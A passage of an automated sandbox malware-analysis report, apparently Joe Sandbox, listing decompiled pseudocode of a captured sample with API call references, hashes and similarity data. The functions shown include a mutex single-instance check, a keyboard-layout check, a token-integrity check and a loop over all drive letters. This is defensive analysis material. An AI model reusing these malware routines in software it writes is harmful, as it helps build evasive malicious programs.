						if(__eflags >= 0) {
							goto L14;
						}
						_t68 = E009B73D8(__eflags, _t62 + _t69);
						_t47 = E009B6137(_t46, 0x2e);
						_t29 = _t47 + 1; // 0x1
						 *_t47 = 0;
						_t48 = E009B6C81(_t46, _t29);
						E009B4999(_t68);
						_t37 = _t48;
						goto L8;
					}
					_t37 = 0;
					goto L9;
				}
				return 0;
			}



















            0x009b6c90
            0x009b6c96
            0x009b6c98
            0x009b6ca2
            0x009b6cac
            0x009b6cae
            0x009b6cb4
            0x009b6cbe
            0x009b6cc8
            0x009b6ccb
            0x009b6ccd
            0x009b6ccf
            0x009b6cd2
            0x009b6cd5
            0x009b6cd8
            0x009b6d04
            0x009b6d04
            0x009b6d04
            0x009b6d06
            0x009b6d07
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009b6cda
            0x009b6cda
            0x009b6ce8
            0x009b6ceb
            0x009b6cf1
            0x009b6cf3
            0x009b6cf6
            0x00000000
            0x00000000
            0x009b6cf8
            0x009b6cfb
            0x009b6cfc
            0x009b6cff
            0x009b6d02
            0x00000000
            0x00000000
            0x00000000
            0x009b6d02
            0x009b6d17
            0x009b6d1a
            0x009b6d1d
            0x009b6d58
            0x009b6d58
            0x00000000
            0x009b6d58
            0x009b6d25
            0x009b6d27
            0x00000000
            0x00000000
            0x009b6d32
            0x009b6d37
            0x009b6d3c
            0x009b6d3f
            0x009b6d44
            0x009b6d4c
            0x009b6d54
            0x00000000
            0x009b6d54
            0x009b6cb6
            0x00000000
            0x009b6cb6
            0x00000000

            APIs
            • LoadLibraryA.KERNELBASE(?), ref: 009B6C96
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 615ae9f44a3a99f0a0d59240483a2fb26521b84891effc3a7bcf38abd1125ff1
            • Instruction ID: 43dc514fff4ac8de1345f6379aa12b290c94bd2e3c6f8b955d60e6482aa4be10
            • Opcode Fuzzy Hash: 615ae9f44a3a99f0a0d59240483a2fb26521b84891effc3a7bcf38abd1125ff1
            • Instruction Fuzzy Hash: F531BF70A00114AFCB14EF68CE81ABDB7F9EF88720B24049AE845D7642E779F951DB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B79C5, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E009B79C5(int _a4) {
				short _v6;
				char _v20;
				WCHAR* _t11;
				int _t18;
				signed int _t26;
				short _t27;
				void* _t28;
				void* _t33;
				WCHAR* _t35;

				_t11 = E009B494C(0xfffe);
				_t35 = _t11;
				_pop(_t28);
				_t38 = _t35;
				if(_t35 == 0) {
					return _t11;
				} else {
					E009B5E33(0x9c1338, 0x38c, 0x10, 0xe,  &_v20);
					_v6 = 0;
					E009B61F8(_t35,  &_v20);
					E009B5162(_t28, _t38); // executed
					_t33 = 0x5a;
					while(_t35[4] <= _t33) {
						_t18 = GetDriveTypeW(_t35); // executed
						__eflags = _t18 + 0xfffffffe - 2;
						if(_t18 + 0xfffffffe <= 2) {
							 *0x9c1d80 =  *0x9c1d80 & 0x00000000;
							E009B766A(_t35, _a4); // executed
							_t26 = _t35[4] & 0x0000ffff;
							__eflags = _t26 - 0x61;
							if(_t26 >= 0x61) {
								__eflags = _t26 - 0x7a;
								if(_t26 <= 0x7a) {
									_t27 = _t26 & 0x0000ffdf;
									__eflags = _t27;
									_t35[4] = _t27;
								}
							}
						}
						_t35[4] = _t35[4] + 1;
						__eflags = 0;
						_t35[7] = 0;
					}
					RevertToSelf(); // executed
					E009B4999(_t35);
					return 1;
				}
			}












            0x009b79d1
            0x009b79d6
            0x009b79d8
            0x009b79d9
            0x009b79db
            0x009b7a72
            0x009b79e1
            0x009b79f4
            0x009b79fb
            0x009b7a04
            0x009b7a0c
            0x009b7a13
            0x009b7a58
            0x009b7a17
            0x009b7a20
            0x009b7a23
            0x009b7a28
            0x009b7a30
            0x009b7a35
            0x009b7a3b
            0x009b7a3e
            0x009b7a40
            0x009b7a43
            0x009b7a45
            0x009b7a45
            0x009b7a4a
            0x009b7a4a
            0x009b7a43
            0x009b7a3e
            0x009b7a4e
            0x009b7a52
            0x009b7a54
            0x009b7a54
            0x009b7a5e
            0x009b7a64
            0x00000000
            0x009b7a6d

            APIs
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
              • Part of subcall function 009B5162: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,00000001), ref: 009B519A
            • GetDriveTypeW.KERNELBASE(00000000,?,?,?,?,?,00000001,00000000,?,?,009B34D4,?,?,?,00000000,00000000), ref: 009B7A17
            • RevertToSelf.ADVAPI32(?,?,?,?,?,00000001,00000000,?,?,009B34D4,?,?,?,00000000,00000000), ref: 009B7A5E
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: HeapProcess$CreateDriveOpenRevertSelfType
            • String ID:
            • API String ID: 3515759238-0
            • Opcode ID: 944a83d2e17ce3cf6dac09f2003e3fba9b7b472a46e0ef97b95c4d48a1515383
            • Instruction ID: 72a2e9c7cae748348738d285de3f8609163410d1c2dcf971d1a868faee98c8f5
            • Opcode Fuzzy Hash: 944a83d2e17ce3cf6dac09f2003e3fba9b7b472a46e0ef97b95c4d48a1515383
            • Instruction Fuzzy Hash: 46114C32958B1566D320B7E8DD02FFFB3A8DF82731F104A2AF455D55D2E660D640839A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B437D, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
            Download Yara Rule
            C-Code - Quality: 73%
            			E009B437D(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* _t2;
				void* _t5;
				void* _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				void* _t20;
				intOrPtr _t24;
				intOrPtr _t29;

				_t20 = __edi;
				_t15 = __ecx;
				_t14 = __ebx;
				L009B7EE3(); // executed
				_t2 = E009B1500(); // executed
				if(_t2 == 0) {
					_push(1);
					L5:
					E009B4C87();
					L6:
					SetErrorMode(1); // executed
					if(E009B5408() >= 0x600) {
						_t10 =  *0x9c1228(0, 0x12); // executed
						if(_t10 != 0) {
							if(E009B41C3() == 0) {
								E009B5162(0x600, __eflags);
							} else {
								E009B4C87(0);
							}
						}
					}
					_t29 =  *0x9c230c; // 0x0
					if(_t29 == 0) {
						_t8 = E009B52D4(); // executed
						if(_t8 == 0) {
							E009B5982(_t14, _t20); // executed
						} else {
							E009B4C87(0);
						}
					}
					_t5 = E009B37A8(_t20); // executed
					E009B7EE2(_t5);
					return 0;
				}
				_t24 =  *0x9c22f4; // 0x0
				if(_t24 != 0 || E009B5204(_t15, _t24) == 0) {
					goto L6;
				} else {
					_push(0);
					goto L5;
				}
			}












            0x009b437d
            0x009b437d
            0x009b437d
            0x009b437e
            0x009b4383
            0x009b438c
            0x009b43a2
            0x009b43a4
            0x009b43a4
            0x009b43aa
            0x009b43ac
            0x009b43bf
            0x009b43c4
            0x009b43cc
            0x009b43d5
            0x009b43e0
            0x009b43d7
            0x009b43d8
            0x009b43dd
            0x009b43d5
            0x009b43cc
            0x009b43e5
            0x009b43eb
            0x009b43ed
            0x009b43f4
            0x009b43ff
            0x009b43f6
            0x009b43f7
            0x009b43fc
            0x009b43f4
            0x009b4404
            0x009b4409
            0x009b4411
            0x009b4411
            0x009b438e
            0x009b4394
            0x00000000
            0x009b439f
            0x009b439f
            0x00000000
            0x009b439f

            APIs
            • SetErrorMode.KERNELBASE(00000001,?,009B441B,00000000), ref: 009B43AC
            • SHTestTokenMembership.SHELL32(00000000,00000012), ref: 009B43C4
              • Part of subcall function 009B5204: GetKeyboardLayoutList.USER32(00000000,00000000,00000001,00000000,009C0270,?,?,009B19FE), ref: 009B5217
              • Part of subcall function 009B5204: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,009B19FE), ref: 009B5237
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: KeyboardLayoutList$ErrorMembershipModeTestToken
            • String ID:
            • API String ID: 3728304949-0
            • Opcode ID: abc37d2120625f0864889460d2f871a259e666874310763ebf66a2b1c5ce702a
            • Instruction ID: 19564480e167c99d84acc7ac35c9f8089988ccf307b92c26ef847a1123e4cbc2
            • Opcode Fuzzy Hash: abc37d2120625f0864889460d2f871a259e666874310763ebf66a2b1c5ce702a
            • Instruction Fuzzy Hash: 5501AF2019B5269AEB2577B15F03BEE12CC8FD0F72F2C0525B551940A7EE45C842B1B7
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B52D3, Relevance: 3.0, APIs: 2, Instructions: 32synchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B52D3(void* __edx) {
				short _v6;
				short _v92;
				intOrPtr _v117;
				void* _t10;
				struct _SECURITY_ATTRIBUTES* _t15;

				_v117 = _v117 + __edx;
				E009B5E33(0x9c1338, 0x2ae, 0xf, 0x56,  &_v92);
				_v6 = 0;
				_t15 = 0;
				_t10 = CreateMutexW(0, 0,  &_v92); // executed
				 *0x9c1dc0 = _t10;
				if(_t10 != 0 && RtlGetLastWin32Error() == 0xb7) {
					_t15 = 1;
				}
				return _t15;
			}








            0x009b52d3
            0x009b52ed
            0x009b52f7
            0x009b52fb
            0x009b5303
            0x009b5309
            0x009b5310
            0x009b531f
            0x009b531f
            0x009b5326

            APIs
            • CreateMutexW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000), ref: 009B5303
            • RtlGetLastWin32Error.NTDLL ref: 009B5312
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateErrorLastMutexWin32
            • String ID:
            • API String ID: 682235734-0
            • Opcode ID: b4ac11b93a457901a8f1be6f60f2d7ee94e2fdf305e833958dd5072141c955a1
            • Instruction ID: 109388f8b0d1d2a829de2634143687883b6d14943b40c855c39675016099ed08
            • Opcode Fuzzy Hash: b4ac11b93a457901a8f1be6f60f2d7ee94e2fdf305e833958dd5072141c955a1
            • Instruction Fuzzy Hash: 0BF02021E14654AACB219BE89C06FDB3BACEF06390F410162EE05E2182E6908504CBA6
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B52D4, Relevance: 3.0, APIs: 2, Instructions: 32synchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B52D4() {
				short _v6;
				short _v92;
				void* _t8;
				struct _SECURITY_ATTRIBUTES* _t11;

				E009B5E33(0x9c1338, 0x2ae, 0xf, 0x56,  &_v92);
				_v6 = 0;
				_t11 = 0;
				_t8 = CreateMutexW(0, 0,  &_v92); // executed
				 *0x9c1dc0 = _t8;
				if(_t8 != 0 && RtlGetLastWin32Error() == 0xb7) {
					_t11 = 1;
				}
				return _t11;
			}







            0x009b52ed
            0x009b52f7
            0x009b52fb
            0x009b5303
            0x009b5309
            0x009b5310
            0x009b531f
            0x009b531f
            0x009b5326

            APIs
            • CreateMutexW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000), ref: 009B5303
            • RtlGetLastWin32Error.NTDLL ref: 009B5312
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CreateErrorLastMutexWin32
            • String ID:
            • API String ID: 682235734-0
            • Opcode ID: 314d013d936199fcc67529660a0a8cda835859163bdb621250c62217299a2b95
            • Instruction ID: a7145b4055b5625e21e61fdd2ec9dfd7b4f9eaea2c865d85a1487ef3a35ec582
            • Opcode Fuzzy Hash: 314d013d936199fcc67529660a0a8cda835859163bdb621250c62217299a2b95
            • Instruction Fuzzy Hash: 35F0E561E10618BBD7116BE89D06FDB77ECEF45750F410161FE05D21C5EA50C904C7EA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4DB2, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E009B4DB2(void* _a4) {
				void _v8;
				void* _v12;
				long _v16;
				signed int _t17;

				_v8 = _v8 & 0x00000000;
				if(OpenProcessToken(_a4, 8,  &_v12) != 0) {
					_t17 = GetTokenInformation(_v12, 0x12,  &_v8, 4,  &_v16); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t17;
					E009B4BEE(_v12);
				}
				return _v8;
			}







            0x009b4db8
            0x009b4dcd
            0x009b4dde
            0x009b4de9
            0x009b4deb
            0x009b4dee
            0x009b4df3
            0x009b4dfa

            APIs
            • OpenProcessToken.ADVAPI32(009B59AA,00000008,009B59AA,?,009B59AA), ref: 009B4DC5
            • GetTokenInformation.KERNELBASE(009B59AA,00000012(TokenIntegrityLevel),00000000,00000004,?,?,009B59AA), ref: 009B4DDE
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Token$ChangeCloseFindInformationNotificationOpenProcess
            • String ID:
            • API String ID: 3152771255-0
            • Opcode ID: 03baf30baae853d983473d9976c4130776161b2911d74156906dc7f9f28efd2d
            • Instruction ID: 8f5e5adc6b8003a3b232debf415396575ac96234530be607a3a6514e7ea67396
            • Opcode Fuzzy Hash: 03baf30baae853d983473d9976c4130776161b2911d74156906dc7f9f28efd2d
            • Instruction Fuzzy Hash: C9F0F835E5410CBBDF10DAA0DE05FECBBBCEB04711F1040A1BA04E2091D7309B58AB50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B1DBB, Relevance: 1.6, APIs: 1, Instructions: 139COMMON
            Download Yara Rule
            C-Code - Quality: 70%
            			E009B1DBB(void* __edx, int* _a4) {
				char _v8;
				short _v12;
				char _v28;
				short _v30;
				char _v80;
				short _v82;
				char _v396;
				void* _t29;
				intOrPtr _t35;
				void* _t39;
				void* _t46;
				void* _t53;
				intOrPtr _t55;
				void* _t57;
				void* _t58;
				int* _t59;
				void* _t60;
				void* _t62;
				void* _t63;

				_t58 = __edx;
				E009B5E33(0x9c0270, 0x768, 0xc, 0x32,  &_v80);
				_v30 = 0;
				E009B5E33(0x9c0270, 0x902, 5, 0x10,  &_v28);
				_t59 = _a4;
				_v12 = 0;
				_t29 = E009B558B(0x80000002,  &_v80,  &_v28,  &_v8, _t59); // executed
				_t60 = _t29;
				_t63 = _t62 + 0x3c;
				if(_t60 != 0) {
					L2:
					if(_v8 == 3) {
						L8:
						return _t60;
					}
					L3:
					_t55 = E009B494C(0x20000);
					if(_t55 != 0) {
						E009B5E33(0x9c0270, 0x5a0, 9, 0x13a,  &_v396);
						_v82 = 0;
						_t35 =  *0x9c2268; // 0x2b592e8
						 *0x9c11b4(_t55, 0x20000,  &_v396, 0x203,  *0x9c2250,  *0x9c2254,  *0x9c226c,  *0x9c2270,  *0x9c2274,  *0x9c2278,  *0x9c227c,  *0x9c2280,  *0x9c2284,  *0x9c2288,  *0x9c228c,  *0x9c22ec,  *0x9c2290, _t35 + 2);
						_t39 = E009B62A1(_t55);
						_t57 = _t59;
						_push(_t39 + _t39);
						_push(_t55);
						_push(0x9c0000);
						_t60 = E009B6BB8(_t58);
						E009B4999(_t55);
						if(_t60 == 0) {
							goto L4;
						}
						_t46 = E009B5609(_t57, 0x80000002,  &_v80,  &_v28, 3, _t60,  *_t59); // executed
						if(_t46 == 0) {
							E009B5609(_t57, 0x80000001,  &_v80,  &_v28, 3, _t60,  *_t59);
						}
						goto L8;
					}
					L4:
					return 0;
				}
				_t53 = E009B558B(0x80000001,  &_v80,  &_v28,  &_v8, _t59); // executed
				_t60 = _t53;
				_t63 = _t63 + 0x14;
				if(_t60 == 0) {
					goto L3;
				}
				goto L2;
			}






















            0x009b1dbb
            0x009b1dda
            0x009b1de1
            0x009b1df3
            0x009b1df8
            0x009b1dfd
            0x009b1e13
            0x009b1e18
            0x009b1e1a
            0x009b1e1f
            0x009b1e41
            0x009b1e45
            0x009b1f56
            0x00000000
            0x009b1f56
            0x009b1e4b
            0x009b1e56
            0x009b1e5b
            0x009b1e7c
            0x009b1e83
            0x009b1e87
            0x009b1eec
            0x009b1ef7
            0x009b1efc
            0x009b1eff
            0x009b1f00
            0x009b1f01
            0x009b1f0c
            0x009b1f0e
            0x009b1f18
            0x00000000
            0x00000000
            0x009b1f30
            0x009b1f3a
            0x009b1f4e
            0x009b1f53
            0x00000000
            0x009b1f3a
            0x009b1e5d
            0x00000000
            0x009b1e5d
            0x009b1e33
            0x009b1e38
            0x009b1e3a
            0x009b1e3f
            0x00000000
            0x00000000
            0x00000000

            APIs
              • Part of subcall function 009B558B: RegOpenKeyExW.KERNELBASE(0000000C,00000007,00000000,00000001,?,009C0270,00000000,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55A2
              • Part of subcall function 009B558B: RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,80000002,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55BC
              • Part of subcall function 009B558B: RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1), ref: 009B55E4
              • Part of subcall function 009B558B: RegCloseKey.KERNELBASE(?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1,00000007,0000000C,?), ref: 009B55FA
            • _snwprintf.NTDLL ref: 009B1EEC
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: QueryValue$CloseOpen_snwprintf
            • String ID:
            • API String ID: 775465768-0
            • Opcode ID: cf86b24f4655c1c7716ddeeaa4bc558fd6fbb4483d9d005adc87b7c3395b9373
            • Instruction ID: 018f73c6782b2e0948183b92d506ba907ca04badfae7e3c27db7704f35b19c2c
            • Opcode Fuzzy Hash: cf86b24f4655c1c7716ddeeaa4bc558fd6fbb4483d9d005adc87b7c3395b9373
            • Instruction Fuzzy Hash: 9A419272D44209BFDB219BE0DD46FEBBB7CEB48720F400125FA14E6152E6619A11EBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B3561, Relevance: 1.6, APIs: 1, Instructions: 120COMMON
            Download Yara Rule
            C-Code - Quality: 87%
            			E009B3561(intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* _t30;
				long _t32;
				void* _t39;
				void* _t41;
				void* _t46;
				char _t51;
				signed int _t54;
				char _t56;
				signed int _t59;
				signed int _t60;
				void* _t62;
				void* _t67;
				void* _t68;
				intOrPtr _t74;
				intOrPtr _t80;

				_t66 = _a4;
				_t30 = E009B7568(_a4,  &_v12,  &_v16,  &_v8, 0xffffffff);
				_t68 = _t67 + 0x14;
				if( *0x9c1d84 == 0) {
					do {
						if(_t30 == 0) {
							_t32 = RtlGetLastWin32Error();
							__eflags = _t32 - 0x26;
							if(_t32 == 0x26) {
								E009B2E8C(_t66, _v8);
								goto L22;
							}
						} else {
							_push(0);
							E009B7636(_v8, _v12);
							_t56 = _v8;
							_t68 = _t68 + 0xc;
							if( *0x9c22d8 == 2 &&  *((intOrPtr*)(_t56 + 0x150)) == 2) {
								 *((intOrPtr*)(_t56 + 0x20)) =  *((intOrPtr*)(_t56 + 0x20)) - _v12;
								asm("sbb [ecx+0x24], edi");
								_t51 = _v8;
								_t59 =  *0x9c22dc; // 0x0
								_t60 = _t59 << 0x14;
								_t74 =  *((intOrPtr*)(_t51 + 0x24));
								if(_t74 < 0 || _t74 <= 0 &&  *((intOrPtr*)(_t51 + 0x20)) <= _t60) {
									_push( *((intOrPtr*)(_t51 + 0x24)));
									E009B7636(_t51,  *((intOrPtr*)(_t51 + 0x20)));
									_t68 = _t68 + 0xc;
								} else {
									_push(0);
									E009B7636(_t51, _t60);
									_t61 = _v8;
									_t68 = _t68 + 0xc;
									_t54 =  *0x9c22dc; // 0x0
									 *((intOrPtr*)(_t61 + 0x20)) =  *((intOrPtr*)(_v8 + 0x20)) - (_t54 << 0x14);
									asm("sbb [ecx+0x24], edi");
								}
								_t56 = _v8;
							}
							_t39 =  *((intOrPtr*)(_t56 + 0x154)) - 1;
							if(_t39 == 0) {
								E009B3236(_t66, _t56, 2); // executed
								goto L19;
							} else {
								_t41 = _t39 - 1;
								if(_t41 == 0) {
									__eflags =  *0x9c22d8 - 1; // 0x0
									_t62 = 3;
									_t44 =  ==  ? _t62 : 1;
									E009B36AB(_t62, __eflags, _t56, _v12,  ==  ? _t62 : 1); // executed
									L19:
									_t68 = _t68 + 0xc;
								} else {
									_t46 = _t41 - 1;
									if(_t46 == 0) {
										E009B3722(_t56, 4); // executed
										goto L22;
									} else {
										_t79 = _t46 == 1;
										if(_t46 == 1) {
											E009B3150(_t79, _t66, _t56); // executed
											L22:
										}
									}
								}
							}
						}
						_t30 = E009B7568(_t66,  &_v12,  &_v16,  &_v8, 0xffffffff);
						_t68 = _t68 + 0x14;
						_t80 =  *0x9c1d84; // 0x1
					} while (_t80 == 0);
				}
				asm("lock dec dword [esi+0x8]");
				return 0;
			}





















            0x009b356b
            0x009b357a
            0x009b357f
            0x009b3589
            0x009b3592
            0x009b3594
            0x009b3665
            0x009b366a
            0x009b366d
            0x009b3673
            0x00000000
            0x009b3673
            0x009b359a
            0x009b359a
            0x009b35a1
            0x009b35a6
            0x009b35a9
            0x009b35b3
            0x009b35c1
            0x009b35c4
            0x009b35c7
            0x009b35ca
            0x009b35d0
            0x009b35d3
            0x009b35d6
            0x009b35fd
            0x009b3604
            0x009b3609
            0x009b35df
            0x009b35df
            0x009b35e2
            0x009b35e7
            0x009b35ea
            0x009b35ed
            0x009b35f5
            0x009b35f8
            0x009b35f8
            0x009b360c
            0x009b360c
            0x009b3615
            0x009b3618
            0x009b365b
            0x00000000
            0x009b361a
            0x009b361a
            0x009b361d
            0x009b363f
            0x009b3647
            0x009b3648
            0x009b3650
            0x009b3660
            0x009b3660
            0x009b361f
            0x009b361f
            0x009b3622
            0x009b3635
            0x00000000
            0x009b3624
            0x009b3624
            0x009b3627
            0x009b362b
            0x009b3678
            0x009b3679
            0x009b3627
            0x009b3622
            0x009b361d
            0x009b3618
            0x009b3689
            0x009b368e
            0x009b3691
            0x009b3691
            0x009b369d
            0x009b369e
            0x009b36a8

            APIs
              • Part of subcall function 009B7568: GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,009B357F,?,?,?,?,000000FF), ref: 009B757D
            • RtlGetLastWin32Error.NTDLL ref: 009B3665
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CompletionErrorLastQueuedStatusWin32
            • String ID:
            • API String ID: 2679338362-0
            • Opcode ID: a7195bbd6e637c954a2c0ccd57b42a089f250040100b561d584d5b34ff8873c5
            • Instruction ID: 006a5975ee44aa1bff688e70c62e0cde905a4675306bbed381907622c6410b48
            • Opcode Fuzzy Hash: a7195bbd6e637c954a2c0ccd57b42a089f250040100b561d584d5b34ff8873c5
            • Instruction Fuzzy Hash: 524193B2804108FFDB25DBA8CF47EEA77ACEB85320F10426AF41596251EB31DB41D765
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4FEC, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
            Download Yara Rule
            C-Code - Quality: 91%
            			E009B4FEC(void* __edx) {
				char _v8;
				short _v12;
				short _v28;
				char _v92;
				WCHAR* _t11;
				char _t12;
				void* _t14;
				void* _t30;
				WCHAR* _t31;

				_t30 = __edx;
				_t11 = E009B494C(0x22);
				_t31 = _t11;
				if(_t31 != 0) {
					_t12 = E009B576A(); // executed
					_v8 = _t12;
					_t14 = E009B69B3(0x539,  &_v8, 4);
					E009B49D3( &_v92, 0, 0x40);
					E009B4C25(_t30,  &_v92);
					E009B5E33(0x9c1338, 0x5d8, 5, 0x10,  &_v28);
					_v12 = 0;
					_push(_v8);
					wsprintfW(_t31,  &_v28, E009B69B3(_t14,  &_v92, E009B628E( &_v92)));
					return _t31;
				}
				return _t11;
			}












            0x009b4fec
            0x009b4ff5
            0x009b4ffa
            0x009b4fff
            0x009b5002
            0x009b5007
            0x009b5015
            0x009b5024
            0x009b502d
            0x009b5044
            0x009b504e
            0x009b5055
            0x009b5072
            0x00000000
            0x009b507d
            0x009b5082

            APIs
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
